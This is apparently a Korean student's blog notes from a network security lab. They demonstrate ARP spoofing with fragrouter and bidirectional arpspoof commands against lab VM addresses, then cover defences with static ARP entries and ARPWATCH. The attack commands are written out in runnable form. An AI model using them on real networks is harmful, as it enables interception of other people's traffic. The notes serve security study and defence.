티스토리 뷰
fragrouter //ip 포워드 기능을 해주는 도구, 툴
fragrouter -B1 //앞으로 페도라 리눅스 서버는 라우터 처럼 패킷 중계를 해줌 아이피 포워드 기능 활성화 한것
arpspoof -i eth2 -t 192.168.197.129 192.168.197.156 타겟에 있는 156 정보를 공격자 BACKTRACK의 맥주소로 바꾸겠다
그럼
192.168.197.156 is-at 0:c:29:ba:2:17 //156 의 맥주소(백트랙의 맥주소)는 이거야 라고 arp reply를 계속 날림
시험에 나오는것 ★
arp -a
에서 고유한 맥주소가 두개임
계속 arp reply가 날아가기 때문에 계속 유지가 되는 것임
icmp echo reply가 나갈텐데
arpspoof -i -t 192.168.197.156 192.168.197.129
//양방향으로 주고받는 패킷을 다 스니핑 함
arpspoof 라는 공격툴로인해 변조 되었다.
ipforward 기능이 동작해서 wireshark에 두개씩 찍힌거임
대응방법
arp 캐시를 정적으로 설정한다
페도라 서버의 주소를 정적으로 설정
arp -a // 맥주소 정보 확인
arp -s 192.168.197.156 00-0c-29-0c-a6-c6
arp -a //으로 type이 static 인지 확인
ping 이제대로 되면 이상 없는 것
arpspoof -i eth2 -t 192.168.197.129 192.168.197.156//타겟에 대해서 156 정보를 변조하겠다
다시 공격했는데 정적으로 설정된 주소는 안바뀜
arp 정적으로 구성 한다.
근데 시스템 종료 시 삭제가 되므로 기동시마다 ARP 캐시를 정적으로 구성해 주어야 한다.
재부팅시 static 날라감
ARP 트래픽을 실시간으로 모니터링하는 프로그램 : ARPWATCH
'2.네트워크보안' 카테고리의 다른 글
netstat 명령어 옵션 실습 / ifconfig promisc 설정 실습 (0) | 2019.10.20 |
---|---|
네트워크 관리 명령어 실습[ping] (0) | 2019.10.17 |
- Total
- Today
- Yesterday
- 포렌식 도구
- 주요정보통신기반시설
- 주의사항
- 웹서버
- AWS
- vmwareesxi
- HTTP
- OMG
- VPC
- 라우팅테이블
- DMZ
- burp suite
- IAM
- WordPress
- password
- docker
- 라우터
- 까먹음
- vmware esxi #linux-mint
- 웹 취약점 진단
- 게이트웨이
- 디지털포렌식
- 보안공부
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
31 |